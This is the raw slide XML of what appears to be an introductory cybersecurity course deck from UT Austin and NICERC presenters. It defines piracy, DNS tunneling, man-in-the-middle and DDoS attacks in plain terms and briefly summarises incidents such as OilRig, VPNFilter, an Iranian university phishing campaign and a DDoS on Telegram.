              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The University of Texas at Austin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>johnbowen@utexas.edu </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4404140" y="5108358"/>
            <a:ext cx="0" cy="1308100"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="CD6B00"/>
            </a:solidFill>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042" y="1153686"/>
            <a:ext cx="4207084" cy="2636439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5161297" y="818273"/>
            <a:ext cx="96252" cy="32164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AC1F7A-07CA-4393-8510-088A1D7F5D9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738680" y="4880180"/>
            <a:ext cx="3068724" cy="1723549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tommy Gober</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Curriculum Development Specialist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NICERC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>tommy.gober@cyber.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41177825-56A1-404D-A886-2FCD82D5604B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8141944" y="5108358"/>
            <a:ext cx="0" cy="1308100"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="CD6B00"/>
            </a:solidFill>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141C245A-B0AD-48F0-8C03-4C8D0ADBE863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476485" y="4854563"/>
            <a:ext cx="3427859" cy="1733873"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>John F. Owen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Practice Manager, Data &amp; Analytics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333F48"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set Solutions, Inc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>setsolutions.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133328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2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Piracy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Illegally accessing, copying, or transmitting copyrighted commercial information without consent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168763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err="1">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> – DNS Tunneling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1785104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>What is DNS Tunneling?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A method of cyber attack that encodes the data of other programs or protocols in DNS queries and responses. DNS tunneling often includes data payloads that can be added to an attacked DNS server and used to control a remote server and applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Diagram showing basic tunneling process">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3934E606-AAEE-481E-A48A-981DA69F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653" y="3428239"/>
            <a:ext cx="8049491" cy="27250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795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err="1">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> – DNS Tunneling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Who is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OilRig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>An Iran-linked APT group known since 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Targets organizations primarily in financial, government, energy, telecom, and chemical sectors in the United States and Middle East</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Use DNS tunneling to protect communications with command &amp; control infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25897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Iranian Threat Group – URL Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839"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rial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>16 Domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>300+ Fake Websites and Logon Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>76 Universities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>14 Countries (Australia, Canada, China, Israel, Japan, Switzerland, Turkey, United Kingdom, United States)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial"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Victims entered credentials into a fake login page</a:t>
            </a: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Redirected to the legitimate website where they were automatically logged into a valid session or were prompted to enter their credentials again.</a:t>
            </a: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Numerous spoofed domains referenced the targeted universities' online library systems, indicating the threat actors' intent to gain access to these resources.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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167468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Man-In-The-Middle (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>) Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="985683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An attacker intercepts communications between two parties either to secretly eavesdrop or modify traffic traveling between the two.</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Can be used to steal login credentials or personal information, spy on the victim, or sabotage communications or corrupt data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFE3B34F-BCBF-2846-B3A6-BC5E80EE1059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="7672" t="10352" r="9854" b="8462"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2478024" y="3275475"/>
            <a:ext cx="6135624" cy="3335638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9190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err="1">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>VPNFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CD6B00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> Malware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4832092"/>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charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Hackers working for the Russian government</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Malware infected 500,000 consumer-grade routers in 54 countries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Man-in-the-middle attack on incoming web traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Can inject malicious payloads into the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Actively inspected web traffic for sensitive data and passwords </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296868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Distributed Denial-of-Service Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="985683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malicious attempt to disrupt normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46BBD7A7-9571-F04C-A2B5-0955DB313F83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773168" y="2409912"/>
            <a:ext cx="5860288" cy="3886750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105196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China DDoS of Telegram</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839"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charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Telegram is a secure messaging app</a:t>
